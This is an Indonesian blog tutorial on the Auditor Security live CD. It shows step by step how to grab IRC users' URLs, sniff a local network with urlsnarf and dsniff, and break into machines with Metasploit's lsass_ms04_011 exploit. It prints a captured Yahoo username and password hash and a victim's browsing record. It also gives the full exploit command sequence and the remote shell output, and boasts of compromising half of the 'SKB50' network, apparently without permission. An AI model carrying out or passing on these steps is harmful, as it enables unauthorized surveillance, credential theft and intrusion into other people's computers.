Jumat, 06 Februari 2009

Grabbing URL, Sniffing, dan Remote Exploit

. Jumat, 06 Februari 2009

Auditor security merupakan sebuah system operasi yang bersifat live-system berbasiskan pada knopix.

Menurut penciptanya yang dituliskan pada http://remote-exploit.org , linux Auditor Security diciptakan untuk
memenuhi kebutuhan para excellent-user yang dikombinasikan dengan toolset yang optimal serta penggunakan
yang user friendly. Program – program open source pada auditor security menawarkan toolset yang komplit
untuk meng-analysis keamanan sebuah system, byte per byte.

Dalam tulisan ini akan dibahas sebagian dari security tool set yang terdapat pada linux Auditor Security.

A. Grabbing URL
Yang dimaksusd grabbing URL adalah mendapatkan alamat URL yang dikunjungi oleh seseorang tanpa ataupun sepengetahuan
dari orang tersebut. Di bawah akan dibahas mengenai grabbing URL pada suatu channel IRC dan pada jaringan lokal yang
terhubung dengan internet.

1. Grabbing URL pada channel IRC
Untuk melakukan grabbing URL pada channel IRC bisa dilakukan dengan menggunkan XCHAT yang telah tersedia secara bult-in
pada linux auditor. Langkah pertama tentu saja kita harus join ke channel tertentu. Setelah join ke channel tertentu
langkah selanjutnya klik tab Windows kemudian pilih URL Grabber. Tunggu beberapa saat, maka jika ada salah satu user yang
tergabung pada channel tersebut membuka sebuah URL, list dari URL Grabber akan bertambah.
Berikut ini hasil grabbing URL yang penulis lakukan pada channel : #hnet, #skb50, #indonona, #echo, #k-elektronik, #bandung
pada server dalnet tanggal 1 September 2005.

ftp.orghttp://echo.or.id
http://irc.jraxis.com/dalnet/default/
http://kline.dal.net/exploits/akills.htm#ma
http://kline.dal.net/exploits/akills.htm#ma)))
http://kline.dal.net/massads/mup.htm
http://kline.dal.net/proxy/
http://miranda-im.org
http://tiongkokmusic.com:2222/listen.pls
http://unut.hollosite.com
http://valueshells.com
http://valueshells.com/disc.html
http://www.dal.net/
http://www.dal.net/aup/
http://www.equinix.net
http://www.kecoak.or.id
http://www.malanghack.net/
http://www.rayofshadow.or.id
http://www.valueshells.com
irc.hackerszone.orgirc.vsnl.com
www.balihack.or.idwww.bandung-dal.net
WwW.BaNdUnG.tKwww.dal.net/proxies
www.jraxis.comwww.malanghack.net
WwW.PsYcHoPeD.InFowww.scoopsite.com
www.superask.netwww.VALUESHELLS.com
www.ValueShells.comwww.valueshells.com
www.valueshells.comwww.w0nk.org
www.zone-h.org/en/defacements/mirror/id=2840693/>
www.zone-h.org/en/defacements/mirror/id=2840696/>

Daftar URL diatas merupakan daftar dari URL-URL yang dikunjungi para chatter pada channel – channel diatas.
Kelemahan dari XCHAT yaitu XCHAT belum mampu secara spesifik mengetahui URL yang dikunjungi tiap chatter.


2. Grabbing URL Pada Jaringan Lokal Yang Terhubung Pada Internet

Selain grabbing URL pada suatu channel IRC kita juga bisa melakukan grabbing URL pada jaringan lokal yang terhubung
pada internet. Untuk melakukanya kita bisa menggunakan URL Snarf. Untuk menjalankan URL Snarf ketikan perintah berikut
pada konsole :

hyraxz@chidori~dove# urlsnarf -i eth0 > ./grabMeBabe.txt

Setelah URL Snarf berhasil dijalankan maka tugas kita selanjutnya adalah tinggal tidur dan membuka hasil grabbing
keesokan hari.Berikut ini satu baris potongan dari hasil grabbing URL yang berhasil penulis capture, penulis hanya
menunjukan 1 baris dari 994 baris hasil grabbing yang didapat mulai dari jam 00:15:37 sampai 06:21:10 pada
tanggal 02/Sep/2005.

192.168.10.5 - - [02/Sep/2005:05:38:37 -0400] "GET http://www.friendster.com/friendrequests.php?lastact=approve&sc=933
HTTP/1.1" - - "http://www.friendster.com/friendrequests.php?statpos=homealerts" "Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)"

Dari hasil grabbing tersebut maka kita bisa mengambil suatu analisa bahwa komputer dengan IP 192.168.10.5
pada [02/Sep/2005:05:38:37 -0400] dengan menggunakan methode GET sedang mengakses www.friendster.com dan kemungkinan
besar user tersebut sedang meng-approve friend request. Sangat dimungkinkan browser dari user tersebut adalah
Mozzila/5.0 dengan mamakai sistem operasi linux.


B. Sniffing Menggunakan DSNIFF

Sniffing merupakan usaha yang dilakukan untuk memperoleh suatu informasi tertentu dalam suatu network dangan jalan
meng-capture paket – paket data yang ada pada suatu network dan kemudian menganalisinya untuk diambil informasinya
yang dianggap penting. Dsiniff merupakan suatu tool sniffing yang telah tersedia pada linux auditor security.
Untuk memulai sniffing ketikan perintah berikut ini:

hyraxz@chidori~dove# dsniff –i eth0 –W /mnt/hda5/passwd_HhAN.db

perintah diatas akan memerintahkan dsniff untuk meng-capture paket - paket yang melintasi eth0 dan menuliskan hasilnya
pada sebuah file dengan nama passwd_HhAN.db yang disimpan pada directory /mnt/hda5/.
Untuk membaca hasilnya gunakan perintah berikut ini:

hyraxz@chidori~ dove# dsniff -r /mnt/hda5/passwd_HhAN.db

Atau kalau kita ingin merubahnya dalam format ASCII sehingga file tersebut bisa dibuka menggunakan notepad saat di Windows,
ketik perintah berikut :

hyraxz@chidori~dove# dsniff -r /mnt/hda5/passwd_HhAN.db > /mnt/hda5/GetDownEnemy.txt

Berikut ini merupakan file ASCII hasil dari sniffing yang berhasil penulis documentasikan :

09/02/05 04:58:42 tcp 192.168.10.7.1183 -> p2.rd.scd.yahoo.com.80 (http)GET
/reg/login1/newym_nouc/lisu/login/us/ym/*http://login.yahoo.com/config/login?.tries=1&.src=ym&.md5=&.hash=&.js=1&.
last=&promo=&.intl=us&.bypass=&.partner=&.u=b261flt1heuai&.v=0&.challenge=Ymjr9vf35ZRMTV9YkEFy0vhTsQz0&.yplus=&.
emailCode=&pkg=&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A//mail.yahoo.com&login=rip_zombie
&passwd=ace61b359fa543aceccf111dbd767e74&.persistent=&.hash=1&.md5=1 HTTP/1.1Host: us.rd.yahoo.com

Berikut analysis dari hasil sniffing di atas:
1. Sniffing dilakukan pada tgl 02 September 2005 jam 04:58:42. Sniffing dilakukan pada koneksi TCP antara host dengan
IP 192.168.10.7:1183 dengan server yahoo pada p2.rd.scd.yahoo.com:80 denagan memakai protokol HTTP.
2. User Name untuk login ke server e-mail dari user tersebut adalah rip_zombie dengan password hasil enkripsi
MD5 “ace61b359fa543aceccf111dbd767e74” (tanpa tanda petik).
3. Server mail yahoo menggunakan methode enkripsi MD5.



C. Remote Exploit

Remote exploit adalah suatu program yang dijalankan pada computer attacker, digunakan untuk menginjeksi komputer target
sehingga attacker memperoleh hak akses lebih dari yang diijinkan tanpa ataupun sepengetahuan dari korban.
Linux Auditor Security menyediakan tool tersebut dengan nama Metasploit.
Menyusup di Jaringan SKB50 Menggunakan Metasploit
Sebelum memulainya tentu saja komputer attaccker harus di set IP-nya sesuai dengan IP dari jaringan SKB50. berikut ini
konfigurasi IP dari komputer attacker yang telah disesuaikan dengan konfigurasi IP pada jaringan SKB50.

hyraxz@chidori~dove# ifconfig –eth0 192.168.0.10 netmask 255.255.255.0
hyraxz@chidori~dove# ifconfig
eth0 Link encap:Ethernet HWaddr 00:E0:18:F3:9A:D0
inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:712 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:69398 (67.7 KiB) TX bytes:595 (595.0 b)
Interrupt:5 Base address:0x9800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:10 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:500 (500.0 b) TX bytes:500 (500.0 b)

Selanjutnya ketikan perintah dibawah ini untuk memanggil console metasploit :

hyraxz@chidori~dove# cd /opt/auditor/metasploit
hyraxz@chidori~dove# ./msfconsole

jika berhasil maka akan muncul tulisan seperti berikut ini :


888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
+ -- --=[ msfconsole v2.4 [75 exploits - 75 payloads]
msf >

untuk memulai penggunakanya ketikan perintah-perintah dibawah ini:

msf > show exploits
Metasploit Framework Loaded Exploits
====================================
3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
Credits

afp_loginext
aim_goaway

apache_chunked_win32
arkeia_agent_access

arkeia_type77_macos
arkeia_type77_win32

backupexec_ns
bakbone_netvault_heap

blackice_pam_icq
cabrightstor_disco

cabrightstor_disco_servicepc
cabrightstor_uniagent

calicclnt_getconfig
calicserv_getconfig

distcc_exec
exchange2000_xexch50

globalscapeftp_user_input
ia_webmail

icecast_header
iis40_htr

iis50_printer_overflow
iis50_webdav_ntdll

iis_fp30reg_chunked
iis_nsiislog_post

iis_source_dumper
iis_w3who_overflow

imail_imap_delete
imail_ldap

irix_lpsched_exec
lsass_ms04_011

maxdb_webdbm_get_overflow
mercantec_softcart

minishare_get_overflow
msasn1_ms04_007_killbill

msmq_deleteobject_ms05_017
msrpc_dcom_ms03_026

mssql2000_preauthentication
mssql2000_resolution

netterm_netftpd_user_overflow
openview_omniback

oracle9i_xdb_ftp
oracle9i_xdb_ftp_pass

payload_handler
poptop_negative_read

realserver_describe_linux
samba_nttrans

samba_trans2open
samba_trans2open_osx

samba_trans2open_solsparc
sambar6_search_results

seattlelab_mail_55
sentinel_lm7_overflow

servu_mdtm_overflow
smb_sniffer

solaris_dtspcd_noir
solaris_kcms_readfile

solaris_lpd_exec
solaris_sadmind_exec

solaris_snmpxdmid
solaris_ttyprompt

squid_ntlm_authenticate
svnserve_date

trackercam_phparg_overflow
uow_imap4_copy

uow_imap4_lsub
ut2004_secure_linux

ut2004_secure_win32
warftpd_165_pass

warftpd_165_user
webstar_ftp_user

windows_ssl_pct
wins_ms04_045

wsftp_server_503_mkd
Metasploit Framework Credits

AppleFileServer LoginExt PathName Overflow
AOL Instant Messenger goaway Overflow

Apache Win32 Chunked Encoding
Arkeia Backup Client Remote Access

Arkeia Backup Client Type 77 Overflow (Mac OS X)
Arkeia Backup Client Type 77 Overflow (Win32)

Veritas Backup Exec Name Service Overflow
BakBone NetVault Remote Heap Overflow

ISS PAM.dll ICQ Parser Buffer Overflow
CA BrightStor Discovery Service Overflow

CA BrightStor Discovery Service SERVICEPC Overflo
CA BrightStor Universal Agent Overflow

CA License Client GETCONFIG Overflow
CA License Server GETCONFIG Overflow

DistCC Daemon Command Execution
Exchange 2000 MS03-46 Heap Overflow

GlobalSCAPE Secure FTP Server user input overflow
IA WebMail 3.x Buffer Overflow

Icecast (<= 2.0.1) Header Overwrite (win32)
IIS 4.0 .HTR Buffer Overflow

IIS 5.0 Printer Buffer Overflow
IIS 5.0 WebDAV ntdll.dll Overflow

IIS FrontPage fp30reg.dll Chunked Overflow
IIS nsiislog.dll ISAPI POST Overflow

IIS Web Application Source Code Disclosure
IIS w3who.dll ISAPI Overflow

IMail IMAP4D Delete Overflow
IMail LDAP Service Buffer Overflow

Irix lpsched Command Execution
Microsoft LSASS MSO4-011 Overflow

MaxDB WebDBM GET Buffer Overflow
Mercantec SoftCart CGI Overflow

Minishare 1.41 Buffer Overflow
Microsoft ASN.1 Library Bitstring Heap Overflow

Microsoft Message Queueing Service MSO5-017
Microsoft RPC DCOM MSO3-026

MSSQL 2000/MSDE Hello Buffer Overflow
MSSQL 2000/MSDE Resolution Overflow

NetTerm NetFTPD USER Buffer Overflow
HP OpenView Omniback II Command Execution

Oracle 9i XDB FTP UNLOCK Overflow (win32)
Oracle 9i XDB FTP PASS Overflow (win32)

Metasploit Framework Payload Handler
Poptop Negative Read Overflow

RealServer Describe Buffer Overflow
Samba Fragment Reassembly Overflow

Samba trans2open Overflow
Samba trans2open Overflow (Mac OS X)

Samba trans2open Overflow (Solaris SPARC)
Sambar 6 Search Results Buffer Overflow

Seattle Lab Mail 5.5 POP3 Buffer Overflow
SentinelLM UDP Buffer Overflow

Serv-U FTPD MDTM Overflow
SMB Password Capture Service

Solaris dtspcd Heap Overflow
Solaris KCMS Arbitary File Read

Solaris LPD Command Execution
Solaris sadmind Command Execution

Solaris snmpXdmid AddComponent Overflow
Solaris in.telnetd TTYPROMPT Buffer Overflow

Squid NTLM Authenticate Overflow
Subversion Date Svnserve

TrackerCam PHP Argument Buffer Overflow
University of Washington IMAP4 COPY Overflow

University of Washington IMAP4 LSUB Overflow
Unreal Tournament 2004 "secure" Overflow (Linux)

Unreal Tournament 2004 "secure" Overflow (Win32)
War-FTPD 1.65 PASS Overflow

War-FTPD 1.65 USER Overflow
WebSTAR FTP Server USER Overflow

Microsoft SSL PCT MS04-011 Overflow
Microsoft WINS MS04-045 Code Execution

WS-FTP Server 5.03 MKD Overflow

msf > use lsass_ms04_011
msf lsass_ms04_011 > show payloads
Metasploit Framework Usable Payloads
====================================
win32_adduser

win32_bind
win32_bind_dllinject

win32_bind_meterpreter
win32_bind_stg

win32_bind_stg_upexec
win32_bind_vncinject

win32_exec
win32_passivex

win32_passivex_meterpreter
win32_passivex_stg

win32_passivex_vncinject
win32_reverse

win32_reverse_dllinject
win32_reverse_meterpreter

win32_reverse_ord
win32_reverse_ord_vncinject

win32_reverse_stg
win32_reverse_stg_upexec

win32_reverse_vncinject
Windows Execute net user /ADD

Windows Bind Shell
Windows Bind DLL Inject

Windows Bind Meterpreter DLL Inject
Windows Staged Bind Shell

Windows Staged Bind Upload/Execute
Windows Bind VNC Server DLL Inject

Windows Execute Command
Windows PassiveX ActiveX Injection Payload

Windows PassiveX ActiveX Inject Meterpreter Payload
Windows Staged PassiveX Shell

Windows PassiveX ActiveX Inject VNC Server Payload
Windows Reverse Shell

Windows Reverse DLL Inject
Windows Reverse Meterpreter DLL Inject

Windows Staged Reverse Ordinal Shell
Windows Reverse Ordinal VNC Server Inject

Windows Staged Reverse Shell
Windows Staged Reverse Upload/Execute

Windows Reverse VNC Server Inject


msf lsass_ms04_011 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf lsass_ms04_011(win32_bind) > set RHOST 192.168.0.27
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ------------ ------------------
required RHOST 192.168.0.19 The target address
required RPORT 139 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell
Target: Automatic
msf lsass_ms04_011(win32_bind) > exploit
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows XP target (KICKS)
[*] Windows XP may require two attempts
[*] Sending 8 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.0.10:1382 <-> 192.168.0.27:4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32> netstat -a
netstat -a
Active Connections
Protocol Local Address Foreign Address State
TCP

TCP
TCP

TCP
TCP

TCP
TCP

TCP
TCP

TCP
TCP

TCP
TCP

TCP
UDP

UDP
UDP

UDP
UDP

UDP
UDP

UDP
kicks:epmap

kicks:microsoft-ds
kicks:1025

kicks:1056
kicks:1090

kicks:1095
kicks:1098

kicks:1130
kicks:4444

kicks:5000
kicks:netbios-ssn

kicks:1162
kicks:1169

kicks:4444
kicks:microsoft-ds

kicks:isakmp
kicks:ntp

kicks:1900
kicks:ntp

kicks:netbios-ns
kicks:netbios-dgm

kicks:1900
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

192.168.0.10:1382
*:*

*:*
*:*

*:*
*:*

*:*
*:*

*:*
LISTENING

LISTENING
LISTENING

LISTENING
LISTENING

LISTENING
LISTENING

LISTENING
LISTENING

LISTENING
LISTENING

LISTENING
LISTENING

ESTABLISHED

^c
Caught interrupt, exit connection? [y/n]y
msf lsass_ms04_011(win32_bind) >

Analisa dari hasil aktivitas diatas adalah sebagai berikut :
metasploit meng-attack korban melalui port 139 kemudian memasukan payload yang akan membangun hubungan antara korban
dengan attacker dengan menggunakan mode koneksi TCP, dimana hubungan dilakukan melalui port 4444 pada sisi korban
dan port 1382 pada sisi attacker.Setelah bind port antara attacker dengan korban terbentuk maka attacker menguasai
sepenuhnya aktifitas dari komputer korban. Dari 12 komputer yang hidup saat analisa dilakukan pada jaringan lokal
SKB50 6 buah komputer mampu di tembus dengan menggunakan metasploit, ini berarti bahwa 50% jaringan SKB50 pada saat
itu ada di tangan attacker ;).


Daftar Pustaka :
Fwerd (Kecoak Elektronik), Memanen Password Di Jaringan Lokal dengan dsniff,
Terbitan Online Kecoak Elektronik http://k-elektronik.co.id.
From Exploit, http://new.remote-exploit.org/index.php/Auditor_main.

0 komentar:

:)) ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} :)] ~x( :-t b-( :-L x( =))

Poskan Komentar

 
Contact info submission url: oookezone.blogspot.com/ site_owner: address1:pepe rt 03 trirenggo address2: city: bantul state: yogyakarta country: indonesia postal_code: 55714 phone_number: +62817277309 display_email: site_name: oookezone site_description: javanese annuity
my blog about javanese annuity and tutorial all oookezone
Namablogkamu is proudly powered by Blogger.com | Template by o-om.com